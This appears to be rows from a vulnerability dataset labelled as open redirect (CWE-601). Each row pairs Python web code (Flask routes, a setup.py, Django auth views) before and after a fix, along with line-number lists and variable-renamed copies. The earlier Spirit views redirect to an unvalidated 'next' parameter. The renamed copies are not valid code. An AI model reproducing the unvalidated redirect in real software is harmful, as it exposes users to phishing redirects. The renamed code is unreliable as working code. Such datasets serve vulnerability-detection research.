VAR_10 = sorted(get_all_tags(force=True))
return render_template("tags/all.html", title="All Tags", VAR_10=tags)
@app.route("/VAR_10/<VAR_0>")
def FUNC_6(VAR_0):
if not app.config["SEARCH_CONF"]["enabled"] and not which("rg"):
flash(
"Search (for example ripgrep) must be installed to view pages about embedded VAR_10.",
"error",
)
return redirect("/")
VAR_11 = search(f"#{VAR_0}#", strict=True)
VAR_12 = set(
[item["id"] for item in VAR_11]
) # avoid duplication of VAR_11 between context-aware embedded VAR_10 and metadata ones
for res in search_frontmatter_tags(VAR_0):
if res["id"] not in VAR_12:
VAR_11.append(res)
return render_template(
"tags/show.html",
title=f"Tags - {VAR_0}",
VAR_0=tag_name,
search_result=VAR_11,
)
@app.route("/VAR_13/<int:VAR_1>")
def FUNC_7(VAR_1):
VAR_13 = data.get_item(VAR_1)
VAR_14 = lambda x: (x["title"], x["id"])
VAR_15 = list(
map(VAR_14, data.get_items(structured=False, load_content=False))
)
if not VAR_13:
flash("Data could not be found!", "error")
return redirect("/")
if request.args.get("raw") == "1":
return frontmatter.dumps(VAR_13)
VAR_16 = []
if app.config["SEARCH_CONF"]["enabled"]:
if app.config["SEARCH_CONF"]["engine"] == "ripgrep":
VAR_38 = f"\|{VAR_1}]]"
else:
VAR_38 = f"|{VAR_1})]]"
VAR_16 = search(VAR_38, strict=True)
VAR_17 = forms.MoveItemForm()
VAR_17.path.choices = [("", "root directory")] + [
(pathname, pathname) for pathname in data.get_dirs()
]
VAR_18 = forms.TitleForm()
VAR_18.title.data = VAR_13["title"]
VAR_19 = get_all_tags()
VAR_20 = set()
VAR_21 = r"(?:^|\n| )#(?:[-_a-zA-ZÀ-ÖØ-öø-ÿ0-9]+)#"
for match in re.finditer(VAR_21, VAR_13.content):
VAR_20.add(match.group(0).replace("#", "").lstrip())
return render_template(
"dataobjs/show.html",
title=VAR_13["title"],
VAR_13=dataobj,
VAR_16=backlinks,
current_path=VAR_13["dir"],
VAR_9=forms.DeleteDataForm(),
view_only=0,
search_enabled=app.config["SEARCH_CONF"]["enabled"],
VAR_18=post_title_form,
VAR_17=move_form,
VAR_19=tag_list,
VAR_20=embedded_tags,
VAR_15=titles,
)
@app.route("/VAR_13/move/<int:VAR_1>", methods=["POST"])
def FUNC_8(VAR_1):
VAR_9 = forms.MoveItemForm()
VAR_22 = VAR_9.path.data if VAR_9.path.data != "" else "root directory"
if VAR_9.path.data == None:
flash("No VAR_7 specified.")
return redirect(f"/VAR_13/{VAR_1}")
try:
if data.move_item(VAR_1, VAR_9.path.data):
flash(f"Data successfully moved to {VAR_22}.", "success")
return redirect(f"/VAR_13/{VAR_1}")
else:
flash(f"Data could not be moved to {VAR_22}.", "error")
return redirect(f"/VAR_13/{VAR_1}")
except FileNotFoundError:
flash("Data not found.", "error")
return redirect("/")
except FileExistsError:
flash("Data already in target directory.", "error")
return redirect(f"/VAR_13/{VAR_1}")
@app.route("/VAR_13/delete/<int:VAR_1>", methods=["POST"])
def FUNC_9(VAR_1):
try:
data.delete_item(VAR_1)
except BaseException:
flash("Data could not be found!", "error")
return redirect("/")
flash("Data deleted!", "success")
return redirect("/")
@app.route("/login", methods=["GET", "POST"])
def FUNC_10():
VAR_9 = forms.UserForm()
if VAR_9.validate_on_submit():
VAR_33 = get_db()
VAR_34 = VAR_33.search(
(Query().username == VAR_9.username.data) & (Query().type == "user")
)
if VAR_34 and check_password_hash(VAR_34[0]["hashed_password"], VAR_9.password.data):
VAR_34 = User.from_db(VAR_34[0])
login_user(VAR_34, remember=True)
flash("Login successful!", "success")
VAR_39 = request.args.get("next")
if VAR_39 and is_safe_redirect_url(VAR_39):
return redirect(VAR_39)
else:
return redirect("/")
flash("Invalid credentials", "error")
return redirect("/login")
return render_template("users/FUNC_10.html", VAR_9=VAR_9, title="Login")
@app.route("/logout", methods=["DELETE", "GET"])
def FUNC_11():
logout_user()
flash("Logged out successfully", "success")
return redirect("/")
@app.route("/VAR_34/edit", methods=["GET", "POST"])
def FUNC_12():
VAR_9 = forms.UserForm()
if VAR_9.validate_on_submit():
VAR_33 = get_db()
VAR_33.update(
{
"username": VAR_9.username.data,
"hashed_password": generate_password_hash(VAR_9.password.data),
},
doc_ids=[current_user.id],
)
flash("Information saved!", "success")
return redirect("/")
VAR_9.username.data = current_user.username
return render_template("users/edit.html", VAR_9=VAR_9, title="Edit Profile")
@app.route("/folders/create", methods=["POST"])
def FUNC_13():
VAR_9 = forms.NewFolderForm()
if VAR_9.validate_on_submit():
VAR_7 = Path(VAR_9.parent_dir.data.strip("/")) / VAR_9.new_dir.data
VAR_35 = data.create_dir(str(VAR_7))
flash("Folder successfully created.", "success")
return redirect(f"/?VAR_7={VAR_35}")
flash("Could not create folder.", "error")
return redirect(request.referrer or "/")
@app.route("/folders/delete", methods=["POST"])
def FUNC_14():
VAR_9 = forms.DeleteFolderForm()
if VAR_9.validate_on_submit():
if data.delete_dir(VAR_9.dir_name.data):
flash("Folder successfully deleted.", "success")
return redirect("/")
else:
flash("Folder not found.", "error")
return redirect(request.referrer or "/", 404)
flash("Could not delete folder.", "error")
return redirect(request.referrer or "/")
@app.route("/folders/rename", methods=["POST"])
def FUNC_15():
VAR_9 = forms.RenameDirectoryForm()
if VAR_9.validate_on_submit():
try:
VAR_35 = data.rename_folder(VAR_9.current_path.data, VAR_9.new_name.data)
if not VAR_35:
flash("Invalid input.", "error")
else:
flash("Renamed successfully.", "success")
return redirect(f"/?VAR_7={VAR_35}")
except FileNotFoundError:
flash("Directory not found.", "error")
except FileExistsError:
flash("Target directory exists.", "error")
return redirect("/")
@app.route("/bookmarklet")
def FUNC_16():
return render_template("bookmarklet.html", title="Bookmarklet")
@app.route("/images/<VAR_2>")
def FUNC_17(VAR_2):
if VAR_2 and data.valid_image_filename(VAR_2):
VAR_36 = data.image_exists(VAR_2)
if VAR_36:
return send_file(VAR_36)
else:
return "Image not found", 404
else:
return "Invalid file request", 413
@app.route("/static/custom.css")
def FUNC_18():
if not app.config["THEME_CONF"].get("use_custom_css", False):
return ""
return send_from_directory(
Path(app.config["USER_DIR"]) / "css",
app.config["THEME_CONF"]["custom_css_file"],
)
@app.route("/config", methods=["GET", "POST"])
def FUNC_19():
def FUNC_21(VAR_23, VAR_24, VAR_25):
if VAR_23 != "SECRET_KEY":
if type(VAR_24) is dict:
for k, v in VAR_24.items():
FUNC_21(k, v, VAR_25[VAR_23])
else:
VAR_25[VAR_23] = VAR_24
VAR_9 = forms.config_form(app.config)
VAR_26 = vars(Config())
if VAR_9.validate_on_submit():
VAR_37 = Config()
VAR_37.override(VAR_9.data)
for k, v in vars(VAR_37).items():
FUNC_21(k, v, app.config)
write_config(vars(VAR_37)) # save to filesystem FUNC_19
flash("Config successfully updated.", "success")
elif request.method == "POST":
flash("Could not update FUNC_19.", "error")
return render_template(
"config.html", conf=VAR_9, VAR_26=default, title="Edit Config"
)
@csrf.exempt # exempt from CSRF to be able to submit info directly from FUNC_16
@app.route("/save_from_bookmarklet", methods=["POST"])
def FUNC_20():
VAR_27 = request.form.get("html")
if not VAR_27:
return "No HTML provided", 400
VAR_28 = DataObj(url=request.form.get("url"), type="bookmark")
VAR_28.process_bookmark_url(VAR_27)
if VAR_28.insert():
return redirect(f"/VAR_13/{VAR_28.id}")
else:
return "Could not save bookmark", 500
| [
5,
19,
26,
28,
29,
35,
39,
40,
51,
52,
62,
75,
76,
77,
98,
101,
104,
105,
123,
126,
127,
135,
136,
145,
153,
160,
161,
169,
173,
176,
184,
185,
190,
193,
194,
196,
201,
217,
218,
239,
240,
250,
251,
260,
265,
268,
272,
273,
279,
280,
297,
298,
309,
310,
323,
324,
341,
342,
346,
347,
358,
359,
368,
369,
375,
383,
390,
399,
400,
406,
420,
372,
373,
374,
404,
405,
406,
407,
408,
409,
410
] | [
5,
19,
26,
28,
29,
35,
39,
40,
51,
52,
62,
75,
76,
77,
98,
101,
104,
105,
123,
126,
127,
135,
136,
145,
153,
160,
161,
169,
173,
176,
184,
185,
190,
193,
194,
196,
201,
217,
218,
239,
240,
250,
251,
260,
265,
271,
275,
276,
282,
283,
300,
301,
312,
313,
326,
327,
344,
345,
349,
350,
361,
362,
371,
372,
378,
386,
393,
402,
403,
409,
423,
375,
376,
377,
407,
408,
409,
410,
411,
412,
413
] |
4CWE-601
| # Copyright 2014 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup
setup(
name='security_monkey',
version='0.8.0',
long_description=__doc__,
packages=['security_monkey'],
include_package_data=True,
zip_safe=False,
install_requires=[
'APScheduler==2.1.2',
'Flask==0.10.1',
'Flask-Login==0.2.10',
'Flask-Mail==0.9.0',
'Flask-Migrate==1.3.1',
'Flask-Principal==0.4.0',
'Flask-RESTful==0.3.3',
'Flask-SQLAlchemy==1.0',
'Flask-Script==0.6.3',
'Flask-Security==1.7.4',
'Flask-WTF==0.9.5',
'Jinja2==2.8',
'SQLAlchemy==0.9.2',
'boto>=2.41.0',
'ipaddr==2.1.11',
'itsdangerous==0.23',
'psycopg2==2.5.2',
'bcrypt==2.0.0',
'Sphinx==1.2.2',
'gunicorn==18.0',
'cryptography==1.3.2',
'boto3>=1.4.2',
'botocore>=1.4.81',
'dpath==1.3.2',
'pyyaml==3.11',
'jira==0.32',
'cloudaux>=1.0.6',
'joblib>=0.9.4',
'pyjwt>=1.01',
],
extras_require = {
'onelogin': ['python-saml>=2.2.0'],
'tests': [
'nose==1.3.0',
'mock==1.0.1',
'moto==0.4.30',
'freezegun>=0.3.7'
]
}
)
| # Copyright 2014 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup
setup(
name='security_monkey',
version='0.8.0',
long_description=__doc__,
packages=['security_monkey'],
include_package_data=True,
zip_safe=False,
install_requires=[
'APScheduler==2.1.2',
'Flask==0.10.1',
'Flask-Mail==0.9.0',
'Flask-Migrate==1.3.1',
'Flask-Principal==0.4.0',
'Flask-RESTful==0.3.3',
'Flask-SQLAlchemy==1.0',
'Flask-Script==0.6.3',
# 'Flask-Security==1.7.4',
'Flask-Security-Fork==1.8.2',
'Jinja2==2.8',
'SQLAlchemy==0.9.2',
'boto>=2.41.0',
'ipaddr==2.1.11',
'itsdangerous==0.23',
'psycopg2==2.6.2',
'bcrypt==3.1.2',
'Sphinx==1.2.2',
'gunicorn==18.0',
'cryptography==1.7.1',
'boto3>=1.4.2',
'botocore>=1.4.81',
'dpath==1.3.2',
'pyyaml==3.11',
'jira==0.32',
'cloudaux>=1.0.6',
'joblib>=0.9.4',
'pyjwt>=1.01',
],
extras_require = {
'onelogin': ['python-saml>=2.2.0'],
'tests': [
'nose==1.3.0',
'mock==1.0.1',
'moto==0.4.30',
'freezegun>=0.3.7'
]
}
)
| open_redirect | {
"code": [
" 'Flask-Login==0.2.10',",
" 'Flask-Security==1.7.4',",
" 'Flask-WTF==0.9.5',",
" 'psycopg2==2.5.2',",
" 'bcrypt==2.0.0',",
" 'cryptography==1.3.2',"
],
"line_no": [
26,
33,
34,
40,
41,
44
]
} | {
"code": [
" 'Flask-Security-Fork==1.8.2',",
" 'psycopg2==2.6.2',",
" 'bcrypt==3.1.2',",
" 'cryptography==1.7.1',"
],
"line_no": [
33,
39,
40,
43
]
} |
from setuptools import setup
setup(
name='security_monkey',
version='0.8.0',
long_description=__doc__,
packages=['security_monkey'],
include_package_data=True,
zip_safe=False,
install_requires=[
'APScheduler==2.1.2',
'Flask==0.10.1',
'Flask-Login==0.2.10',
'Flask-Mail==0.9.0',
'Flask-Migrate==1.3.1',
'Flask-Principal==0.4.0',
'Flask-RESTful==0.3.3',
'Flask-SQLAlchemy==1.0',
'Flask-Script==0.6.3',
'Flask-Security==1.7.4',
'Flask-WTF==0.9.5',
'Jinja2==2.8',
'SQLAlchemy==0.9.2',
'boto>=2.41.0',
'ipaddr==2.1.11',
'itsdangerous==0.23',
'psycopg2==2.5.2',
'bcrypt==2.0.0',
'Sphinx==1.2.2',
'gunicorn==18.0',
'cryptography==1.3.2',
'boto3>=1.4.2',
'botocore>=1.4.81',
'dpath==1.3.2',
'pyyaml==3.11',
'jira==0.32',
'cloudaux>=1.0.6',
'joblib>=0.9.4',
'pyjwt>=1.01',
],
extras_require = {
'onelogin': ['python-saml>=2.2.0'],
'tests': [
'nose==1.3.0',
'mock==1.0.1',
'moto==0.4.30',
'freezegun>=0.3.7'
]
}
)
|
from setuptools import setup
setup(
name='security_monkey',
version='0.8.0',
long_description=__doc__,
packages=['security_monkey'],
include_package_data=True,
zip_safe=False,
install_requires=[
'APScheduler==2.1.2',
'Flask==0.10.1',
'Flask-Mail==0.9.0',
'Flask-Migrate==1.3.1',
'Flask-Principal==0.4.0',
'Flask-RESTful==0.3.3',
'Flask-SQLAlchemy==1.0',
'Flask-Script==0.6.3',
'Flask-Security-Fork==1.8.2',
'Jinja2==2.8',
'SQLAlchemy==0.9.2',
'boto>=2.41.0',
'ipaddr==2.1.11',
'itsdangerous==0.23',
'psycopg2==2.6.2',
'bcrypt==3.1.2',
'Sphinx==1.2.2',
'gunicorn==18.0',
'cryptography==1.7.1',
'boto3>=1.4.2',
'botocore>=1.4.81',
'dpath==1.3.2',
'pyyaml==3.11',
'jira==0.32',
'cloudaux>=1.0.6',
'joblib>=0.9.4',
'pyjwt>=1.01',
],
extras_require = {
'onelogin': ['python-saml>=2.2.0'],
'tests': [
'nose==1.3.0',
'mock==1.0.1',
'moto==0.4.30',
'freezegun>=0.3.7'
]
}
)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
15,
64
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
15,
32,
63
] |
4CWE-601
| # -*- coding: utf-8 -*-
from django.contrib import messages
from django.contrib.auth import views as django_views
from django.urls import reverse
from django.shortcuts import redirect, render, get_object_or_404
from django.utils.translation import gettext as _
from django.contrib.auth import get_user_model
from django.urls import reverse_lazy
from spirit.core.conf import settings
from spirit.core.utils.views import is_post, post_data
from spirit.core.utils.ratelimit.decorators import ratelimit
from spirit.user.utils.email import send_activation_email
from spirit.user.utils.tokens import UserActivationTokenGenerator
from .forms import (
RegistrationForm,
LoginForm,
ResendActivationForm,
CustomPasswordResetForm)
User = get_user_model()
# I wish django would not force its crappy CBV on me
class _CustomPasswordResetView(django_views.PasswordResetView):
template_name = 'spirit/user/auth/password_reset_form.html'
email_template_name = 'spirit/user/auth/password_reset_email.html'
subject_template_name = 'spirit/user/auth/password_reset_subject.txt'
success_url = reverse_lazy('spirit:user:auth:password-reset-done')
form_class = CustomPasswordResetForm
class _CustomPasswordResetConfirmView(django_views.PasswordResetConfirmView):
template_name = 'spirit/user/auth/password_reset_confirm.html'
success_url = reverse_lazy('spirit:user:auth:password-reset-complete')
class _CustomPasswordResetCompleteView(django_views.PasswordResetCompleteView):
template_name = 'spirit/user/auth/password_reset_complete.html'
class _CustomPasswordResetDoneView(django_views.PasswordResetDoneView):
template_name = 'spirit/user/auth/password_reset_done.html'
class _CustomLoginView(django_views.LoginView):
template_name = 'spirit/user/auth/login.html'
# Make views sane again
_login_view = _CustomLoginView.as_view()
_logout_view = django_views.LogoutView.as_view()
_password_reset_view = _CustomPasswordResetView.as_view()
custom_password_reset_confirm = _CustomPasswordResetConfirmView.as_view()
custom_password_reset_complete = _CustomPasswordResetCompleteView.as_view()
custom_password_reset_done = _CustomPasswordResetDoneView.as_view()
@ratelimit(field='username', rate='5/5m')
# TODO: @guest_only
def custom_login(request, **kwargs):
# Currently, Django 1.5 login view does not redirect somewhere if the user is logged in
if request.user.is_authenticated:
return redirect(request.GET.get('next', request.user.st.get_absolute_url()))
if request.method == "POST" and request.is_limited():
return redirect(request.get_full_path())
return _login_view(request, authentication_form=LoginForm, **kwargs)
# TODO: @login_required ?
def custom_logout(request, **kwargs):
if not request.user.is_authenticated:
return redirect(request.GET.get('next', reverse(settings.LOGIN_URL)))
if request.method == 'POST':
return _logout_view(request, **kwargs)
return render(request, 'spirit/user/auth/logout.html')
@ratelimit(field='email', rate='5/5m')
def custom_password_reset(request, **kwargs):
if request.method == "POST" and request.is_limited():
return redirect(reverse("spirit:user:auth:password-reset"))
return _password_reset_view(request, **kwargs)
@ratelimit(rate='2/10s')
# TODO: @guest_only
def register(request, registration_form=RegistrationForm):
if request.user.is_authenticated:
return redirect(request.GET.get('next', reverse('spirit:user:update')))
form = registration_form(data=post_data(request))
if (is_post(request) and
not request.is_limited() and
form.is_valid()):
user = form.save()
send_activation_email(request, user)
messages.info(
request, _(
"We have sent you an email to %(email)s "
"so you can activate your account!") % {'email': form.get_email()})
# TODO: email-less activation
# if not settings.REGISTER_EMAIL_ACTIVATION_REQUIRED:
# login(request, user)
# return redirect(request.GET.get('next', reverse('spirit:user:update')))
return redirect(reverse(settings.LOGIN_URL))
return render(
request=request,
template_name='spirit/user/auth/register.html',
context={'form': form})
def registration_activation(request, pk, token):
user = get_object_or_404(User, pk=pk)
activation = UserActivationTokenGenerator()
if activation.is_valid(user, token):
user.st.is_verified = True
user.is_active = True
user.save()
messages.info(request, _("Your account has been activated!"))
return redirect(reverse(settings.LOGIN_URL))
@ratelimit(field='email', rate='5/5m')
# TODO: @guest_only
def resend_activation_email(request):
if request.user.is_authenticated:
return redirect(request.GET.get('next', reverse('spirit:user:update')))
form = ResendActivationForm(data=post_data(request))
if is_post(request):
if not request.is_limited() and form.is_valid():
user = form.get_user()
send_activation_email(request, user)
# TODO: show if is_valid only
messages.info(
request, _(
"If you don't receive an email, please make sure you've entered "
"the address you registered with, and check your spam folder."))
return redirect(reverse(settings.LOGIN_URL))
return render(
request=request,
template_name='spirit/user/auth/activation_resend.html',
context={'form': form})
| # -*- coding: utf-8 -*-
from django.contrib import messages
from django.contrib.auth import views as django_views
from django.urls import reverse
from django.shortcuts import redirect, render, get_object_or_404
from django.utils.translation import gettext as _
from django.contrib.auth import get_user_model
from django.urls import reverse_lazy
from spirit.core.conf import settings
from spirit.core.utils.http import safe_redirect
from spirit.core.utils.views import is_post, post_data
from spirit.core.utils.ratelimit.decorators import ratelimit
from spirit.user.utils.email import send_activation_email
from spirit.user.utils.tokens import UserActivationTokenGenerator
from .forms import (
RegistrationForm,
LoginForm,
ResendActivationForm,
CustomPasswordResetForm)
User = get_user_model()
# I wish django would not force its crappy CBV on me
class _CustomPasswordResetView(django_views.PasswordResetView):
template_name = 'spirit/user/auth/password_reset_form.html'
email_template_name = 'spirit/user/auth/password_reset_email.html'
subject_template_name = 'spirit/user/auth/password_reset_subject.txt'
success_url = reverse_lazy('spirit:user:auth:password-reset-done')
form_class = CustomPasswordResetForm
class _CustomPasswordResetConfirmView(django_views.PasswordResetConfirmView):
template_name = 'spirit/user/auth/password_reset_confirm.html'
success_url = reverse_lazy('spirit:user:auth:password-reset-complete')
class _CustomPasswordResetCompleteView(django_views.PasswordResetCompleteView):
template_name = 'spirit/user/auth/password_reset_complete.html'
class _CustomPasswordResetDoneView(django_views.PasswordResetDoneView):
template_name = 'spirit/user/auth/password_reset_done.html'
class _CustomLoginView(django_views.LoginView):
template_name = 'spirit/user/auth/login.html'
# Make views sane again
_login_view = _CustomLoginView.as_view()
_logout_view = django_views.LogoutView.as_view()
_password_reset_view = _CustomPasswordResetView.as_view()
custom_password_reset_confirm = _CustomPasswordResetConfirmView.as_view()
custom_password_reset_complete = _CustomPasswordResetCompleteView.as_view()
custom_password_reset_done = _CustomPasswordResetDoneView.as_view()
@ratelimit(field='username', rate='5/5m')
# TODO: @guest_only
def custom_login(request, **kwargs):
# Currently, Django 1.5 login view does not redirect somewhere if the user is logged in
if request.user.is_authenticated:
return safe_redirect(
request, 'next', request.user.st.get_absolute_url())
if request.method == "POST" and request.is_limited():
return redirect(request.get_full_path())
return _login_view(request, authentication_form=LoginForm, **kwargs)
# TODO: @login_required ?
def custom_logout(request, **kwargs):
if not request.user.is_authenticated:
return safe_redirect(request, 'next', reverse(settings.LOGIN_URL))
if request.method == 'POST':
return _logout_view(request, **kwargs)
return render(request, 'spirit/user/auth/logout.html')
@ratelimit(field='email', rate='5/5m')
def custom_password_reset(request, **kwargs):
if request.method == "POST" and request.is_limited():
return redirect(reverse("spirit:user:auth:password-reset"))
return _password_reset_view(request, **kwargs)
@ratelimit(rate='2/10s')
# TODO: @guest_only
def register(request, registration_form=RegistrationForm):
if request.user.is_authenticated:
return safe_redirect(request, 'next', reverse('spirit:user:update'))
form = registration_form(data=post_data(request))
if (is_post(request) and
not request.is_limited() and
form.is_valid()):
user = form.save()
send_activation_email(request, user)
messages.info(
request, _(
"We have sent you an email to %(email)s "
"so you can activate your account!") % {'email': form.get_email()})
# TODO: email-less activation
# if not settings.REGISTER_EMAIL_ACTIVATION_REQUIRED:
# login(request, user)
# return safe_redirect(request, 'next', reverse('spirit:user:update'))
return redirect(reverse(settings.LOGIN_URL))
return render(
request=request,
template_name='spirit/user/auth/register.html',
context={'form': form})
def registration_activation(request, pk, token):
user = get_object_or_404(User, pk=pk)
activation = UserActivationTokenGenerator()
if activation.is_valid(user, token):
user.st.is_verified = True
user.is_active = True
user.save()
messages.info(request, _("Your account has been activated!"))
return redirect(reverse(settings.LOGIN_URL))
@ratelimit(field='email', rate='5/5m')
# TODO: @guest_only
def resend_activation_email(request):
if request.user.is_authenticated:
return safe_redirect(request, 'next', reverse('spirit:user:update'))
form = ResendActivationForm(data=post_data(request))
if is_post(request):
if not request.is_limited() and form.is_valid():
user = form.get_user()
send_activation_email(request, user)
# TODO: show if is_valid only
messages.info(
request, _(
"If you don't receive an email, please make sure you've entered "
"the address you registered with, and check your spam folder."))
return redirect(reverse(settings.LOGIN_URL))
return render(
request=request,
template_name='spirit/user/auth/activation_resend.html',
context={'form': form})
| open_redirect | {
"code": [
" return redirect(request.GET.get('next', request.user.st.get_absolute_url()))",
" return redirect(request.GET.get('next', reverse(settings.LOGIN_URL)))",
" return redirect(request.GET.get('next', reverse('spirit:user:update')))",
" return redirect(request.GET.get('next', reverse('spirit:user:update')))"
],
"line_no": [
65,
76,
96,
138
]
} | {
"code": [
"from spirit.core.utils.http import safe_redirect",
" request, 'next', request.user.st.get_absolute_url())",
" return safe_redirect(request, 'next', reverse(settings.LOGIN_URL))",
" return safe_redirect(request, 'next', reverse('spirit:user:update'))",
" return safe_redirect(request, 'next', reverse('spirit:user:update'))"
],
"line_no": [
12,
67,
78,
98,
140
]
} |
from django.contrib import messages
from django.contrib.auth import views as django_views
from django.urls import reverse
from django.shortcuts import redirect, render, get_object_or_404
from django.utils.translation import gettext as _
from django.contrib.auth import get_user_model
from django.urls import reverse_lazy
from spirit.core.conf import settings
from spirit.core.utils.views import is_post, post_data
from spirit.core.utils.ratelimit.decorators import ratelimit
from spirit.user.utils.email import send_activation_email
from spirit.user.utils.tokens import .UserActivationTokenGenerator
from .forms import (
RegistrationForm,
LoginForm,
ResendActivationForm,
CustomPasswordResetForm)
VAR_0 = get_user_model()
class CLASS_0(django_views.PasswordResetView):
VAR_12 = 'spirit/VAR_18/auth/password_reset_form.html'
VAR_13 = 'spirit/VAR_18/auth/password_reset_email.html'
VAR_14 = 'spirit/VAR_18/auth/password_reset_subject.txt'
VAR_15 = reverse_lazy('spirit:VAR_18:auth:password-reset-done')
VAR_16 = CustomPasswordResetForm
class CLASS_1(django_views.PasswordResetConfirmView):
VAR_12 = 'spirit/VAR_18/auth/password_reset_confirm.html'
VAR_15 = reverse_lazy('spirit:VAR_18:auth:password-reset-complete')
class CLASS_2(django_views.PasswordResetCompleteView):
VAR_12 = 'spirit/VAR_18/auth/password_reset_complete.html'
class CLASS_3(django_views.PasswordResetDoneView):
VAR_12 = 'spirit/VAR_18/auth/password_reset_done.html'
class CLASS_4(django_views.LoginView):
VAR_12 = 'spirit/VAR_18/auth/login.html'
VAR_1 = CLASS_4.as_view()
VAR_2 = django_views.LogoutView.as_view()
VAR_3 = CLASS_0.as_view()
VAR_4 = CLASS_1.as_view()
VAR_5 = CLASS_2.as_view()
VAR_6 = CLASS_3.as_view()
@ratelimit(field='username', rate='5/5m')
def FUNC_0(VAR_7, **VAR_8):
if VAR_7.user.is_authenticated:
return redirect(VAR_7.GET.get('next', VAR_7.user.st.get_absolute_url()))
if VAR_7.method == "POST" and VAR_7.is_limited():
return redirect(VAR_7.get_full_path())
return VAR_1(VAR_7, authentication_form=LoginForm, **VAR_8)
def FUNC_1(VAR_7, **VAR_8):
if not VAR_7.user.is_authenticated:
return redirect(VAR_7.GET.get('next', reverse(settings.LOGIN_URL)))
if VAR_7.method == 'POST':
return VAR_2(VAR_7, **VAR_8)
return render(VAR_7, 'spirit/VAR_18/auth/logout.html')
@ratelimit(field='email', rate='5/5m')
def FUNC_2(VAR_7, **VAR_8):
if VAR_7.method == "POST" and VAR_7.is_limited():
return redirect(reverse("spirit:VAR_18:auth:password-reset"))
return VAR_3(VAR_7, **VAR_8)
@ratelimit(rate='2/10s')
def FUNC_3(VAR_7, VAR_9=RegistrationForm):
if VAR_7.user.is_authenticated:
return redirect(VAR_7.GET.get('next', reverse('spirit:VAR_18:update')))
VAR_17 = VAR_9(data=post_data(VAR_7))
if (is_post(VAR_7) and
not VAR_7.is_limited() and
VAR_17.is_valid()):
VAR_18 = VAR_17.save()
send_activation_email(VAR_7, VAR_18)
messages.info(
VAR_7, _(
"We have sent you an email to %(email)s "
"so you can activate your account!") % {'email': VAR_17.get_email()})
return redirect(reverse(settings.LOGIN_URL))
return render(
VAR_7=request,
VAR_12='spirit/VAR_18/auth/FUNC_3.html',
context={'form': VAR_17})
def FUNC_4(VAR_7, VAR_10, VAR_11):
VAR_18 = get_object_or_404(VAR_0, VAR_10=pk)
VAR_19 = UserActivationTokenGenerator()
if VAR_19.is_valid(VAR_18, VAR_11):
VAR_18.st.is_verified = True
VAR_18.is_active = True
VAR_18.save()
messages.info(VAR_7, _("Your account has been activated!"))
return redirect(reverse(settings.LOGIN_URL))
@ratelimit(field='email', rate='5/5m')
def FUNC_5(VAR_7):
if VAR_7.user.is_authenticated:
return redirect(VAR_7.GET.get('next', reverse('spirit:VAR_18:update')))
VAR_17 = ResendActivationForm(data=post_data(VAR_7))
if is_post(VAR_7):
if not VAR_7.is_limited() and VAR_17.is_valid():
VAR_18 = VAR_17.get_user()
send_activation_email(VAR_7, VAR_18)
messages.info(
VAR_7, _(
"If you don't receive an email, please make sure you've entered "
"the address you registered with, and check your spam folder."))
return redirect(reverse(settings.LOGIN_URL))
return render(
VAR_7=request,
VAR_12='spirit/VAR_18/auth/activation_resend.html',
context={'form': VAR_17})
|
from django.contrib import messages
from django.contrib.auth import views as django_views
from django.urls import reverse
from django.shortcuts import redirect, render, get_object_or_404
from django.utils.translation import gettext as _
from django.contrib.auth import get_user_model
from django.urls import reverse_lazy
from spirit.core.conf import settings
from spirit.core.utils.http import safe_redirect
from spirit.core.utils.views import is_post, post_data
from spirit.core.utils.ratelimit.decorators import ratelimit
from spirit.user.utils.email import send_activation_email
from spirit.user.utils.tokens import .UserActivationTokenGenerator
from .forms import (
RegistrationForm,
LoginForm,
ResendActivationForm,
CustomPasswordResetForm)
VAR_0 = get_user_model()
class CLASS_0(django_views.PasswordResetView):
VAR_12 = 'spirit/VAR_18/auth/password_reset_form.html'
VAR_13 = 'spirit/VAR_18/auth/password_reset_email.html'
VAR_14 = 'spirit/VAR_18/auth/password_reset_subject.txt'
VAR_15 = reverse_lazy('spirit:VAR_18:auth:password-reset-done')
VAR_16 = CustomPasswordResetForm
class CLASS_1(django_views.PasswordResetConfirmView):
VAR_12 = 'spirit/VAR_18/auth/password_reset_confirm.html'
VAR_15 = reverse_lazy('spirit:VAR_18:auth:password-reset-complete')
class CLASS_2(django_views.PasswordResetCompleteView):
VAR_12 = 'spirit/VAR_18/auth/password_reset_complete.html'
class CLASS_3(django_views.PasswordResetDoneView):
VAR_12 = 'spirit/VAR_18/auth/password_reset_done.html'
class CLASS_4(django_views.LoginView):
VAR_12 = 'spirit/VAR_18/auth/login.html'
VAR_1 = CLASS_4.as_view()
VAR_2 = django_views.LogoutView.as_view()
VAR_3 = CLASS_0.as_view()
VAR_4 = CLASS_1.as_view()
VAR_5 = CLASS_2.as_view()
VAR_6 = CLASS_3.as_view()
@ratelimit(field='username', rate='5/5m')
def FUNC_0(VAR_7, **VAR_8):
if VAR_7.user.is_authenticated:
return safe_redirect(
VAR_7, 'next', VAR_7.user.st.get_absolute_url())
if VAR_7.method == "POST" and VAR_7.is_limited():
return redirect(VAR_7.get_full_path())
return VAR_1(VAR_7, authentication_form=LoginForm, **VAR_8)
def FUNC_1(VAR_7, **VAR_8):
if not VAR_7.user.is_authenticated:
return safe_redirect(VAR_7, 'next', reverse(settings.LOGIN_URL))
if VAR_7.method == 'POST':
return VAR_2(VAR_7, **VAR_8)
return render(VAR_7, 'spirit/VAR_18/auth/logout.html')
@ratelimit(field='email', rate='5/5m')
def FUNC_2(VAR_7, **VAR_8):
if VAR_7.method == "POST" and VAR_7.is_limited():
return redirect(reverse("spirit:VAR_18:auth:password-reset"))
return VAR_3(VAR_7, **VAR_8)
